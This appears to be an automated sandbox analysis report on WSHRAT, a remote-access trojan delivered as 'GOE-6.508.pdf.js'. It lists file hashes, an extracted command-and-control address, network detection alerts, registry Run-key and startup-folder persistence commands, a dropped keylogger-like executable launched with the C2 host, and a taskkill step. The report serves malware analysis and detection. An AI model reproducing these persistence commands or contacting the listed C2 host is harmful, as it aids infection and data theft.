Analysis
-
max time kernel
156s -
max time network
153s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
01-02-2022 15:41
Static task
static1
Behavioral task
behavioral1
Sample
GOE-6.508.pdf.js
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
GOE-6.508.pdf.js
Resource
win10v2004-en-20220112
General
-
Target
GOE-6.508.pdf.js
-
Size
1.5MB
-
MD5
a35a17d6d986737f8d13c2e7896175b4
-
SHA1
ec1631b83df832f28b20c86b629e0c2862b3334c
-
SHA256
4f3ad298763c484458b73b7e53ff043df5b3923187cda71b50424f14949b336c
-
SHA512
81c8e1d2b857973c752f524fa8461c91fb50ffa33b33d8617fcc326d386c69d2e3b94555651e4f304d98ef2aae2a5a180fcc31b156cbe07e0eb37777c93f2b53
Malware Config
Extracted
wshrat
http://111.90.149.115:5200
Signatures
-
WSHRAT Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\GOE-6.508.pdf.js family_wshrat C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GOE-6.508.pdf.js family_wshrat -
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT CnC Checkin
-
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
-
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
-
Blocklisted process makes network request 30 IoCs
Processes:
wscript.exeflow pid process 5 696 wscript.exe 6 696 wscript.exe 7 696 wscript.exe 8 696 wscript.exe 9 696 wscript.exe 11 696 wscript.exe 12 696 wscript.exe 13 696 wscript.exe 14 696 wscript.exe 15 696 wscript.exe 16 696 wscript.exe 17 696 wscript.exe 18 696 wscript.exe 19 696 wscript.exe 20 696 wscript.exe 21 696 wscript.exe 22 696 wscript.exe 23 696 wscript.exe 24 696 wscript.exe 26 696 wscript.exe 27 696 wscript.exe 28 696 wscript.exe 30 696 wscript.exe 31 696 wscript.exe 32 696 wscript.exe 34 696 wscript.exe 35 696 wscript.exe 36 696 wscript.exe 38 696 wscript.exe 39 696 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
kl-plugin.exepid process 1780 kl-plugin.exe -
Drops startup file 2 IoCs
Processes:
wscript.exewscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GOE-6.508.pdf.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GOE-6.508.pdf.js wscript.exe -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
wscript.exewscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\GOE-6 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\GOE-6.508.pdf.js\"" wscript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GOE-6 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\GOE-6.508.pdf.js\"" wscript.exe Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\GOE-6 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\GOE-6.508.pdf.js\"" wscript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GOE-6 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\GOE-6.508.pdf.js\"" wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\GOE-6.508.pdf pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 532 taskkill.exe -
Script User-Agent 29 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 27 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 36 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 7 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 15 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 22 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 30 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 16 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 26 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 28 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 35 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 8 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 12 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 19 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 24 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 34 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 39 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 9 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 11 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 13 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 18 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 38 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 6 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 17 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 14 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 20 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 23 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 31 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands HTTP User-Agent header 32 WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 540 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 532 taskkill.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exekl-plugin.exepid process 540 AcroRd32.exe 540 AcroRd32.exe 540 AcroRd32.exe 1780 kl-plugin.exe 1780 kl-plugin.exe 540 AcroRd32.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
wscript.exewscript.execmd.exedescription pid process target process PID 308 wrote to memory of 696 308 wscript.exe wscript.exe PID 308 wrote to memory of 696 308 wscript.exe wscript.exe PID 308 wrote to memory of 696 308 wscript.exe wscript.exe PID 696 wrote to memory of 540 696 wscript.exe AcroRd32.exe PID 696 wrote to memory of 540 696 wscript.exe AcroRd32.exe PID 696 wrote to memory of 540 696 wscript.exe AcroRd32.exe PID 696 wrote to memory of 540 696 wscript.exe AcroRd32.exe PID 696 wrote to memory of 1152 696 wscript.exe cmd.exe PID 696 wrote to memory of 1152 696 wscript.exe cmd.exe PID 696 wrote to memory of 1152 696 wscript.exe cmd.exe PID 1152 wrote to memory of 532 1152 cmd.exe taskkill.exe PID 1152 wrote to memory of 532 1152 cmd.exe taskkill.exe PID 1152 wrote to memory of 532 1152 cmd.exe taskkill.exe PID 696 wrote to memory of 1780 696 wscript.exe kl-plugin.exe PID 696 wrote to memory of 1780 696 wscript.exe kl-plugin.exe PID 696 wrote to memory of 1780 696 wscript.exe kl-plugin.exe PID 696 wrote to memory of 1780 696 wscript.exe kl-plugin.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\GOE-6.508.pdf.js1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\GOE-6.508.pdf.js"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\GOE-6.508.pdf"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:540
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\taskkill.exetaskkill /F /IM kl-plugin.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
-
C:\Users\Admin\AppData\Roaming\kl-plugin.exe"C:\Users\Admin\AppData\Roaming\kl-plugin.exe" 111.90.149.115 5200 "WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands" 13⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1780
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
079583d407341726613315054d90c42a
SHA16003dbe6486a771389b135d0df0fcc20d18b3fe6
SHA256d40d608c292bdc6c8181451d7394b8a7f834066e49742be6f655c3284f934b87
SHA512fa1b8b363e728bcecfa4164c866a350f9fa94706b97cff638e962d29a6bfc7f926499fcc24ffbc7e1d70b3a50e5d3523455f71efe84e81bce9e94ae72b787fe8
-
MD5
a35a17d6d986737f8d13c2e7896175b4
SHA1ec1631b83df832f28b20c86b629e0c2862b3334c
SHA2564f3ad298763c484458b73b7e53ff043df5b3923187cda71b50424f14949b336c
SHA51281c8e1d2b857973c752f524fa8461c91fb50ffa33b33d8617fcc326d386c69d2e3b94555651e4f304d98ef2aae2a5a180fcc31b156cbe07e0eb37777c93f2b53
-
MD5
a35a17d6d986737f8d13c2e7896175b4
SHA1ec1631b83df832f28b20c86b629e0c2862b3334c
SHA2564f3ad298763c484458b73b7e53ff043df5b3923187cda71b50424f14949b336c
SHA51281c8e1d2b857973c752f524fa8461c91fb50ffa33b33d8617fcc326d386c69d2e3b94555651e4f304d98ef2aae2a5a180fcc31b156cbe07e0eb37777c93f2b53
-
MD5
7099a939fa30d939ccceb2f0597b19ed
SHA137b644ef5722709cd9024a372db4590916381976
SHA256272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
SHA5126e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721
-
MD5
7099a939fa30d939ccceb2f0597b19ed
SHA137b644ef5722709cd9024a372db4590916381976
SHA256272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
SHA5126e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721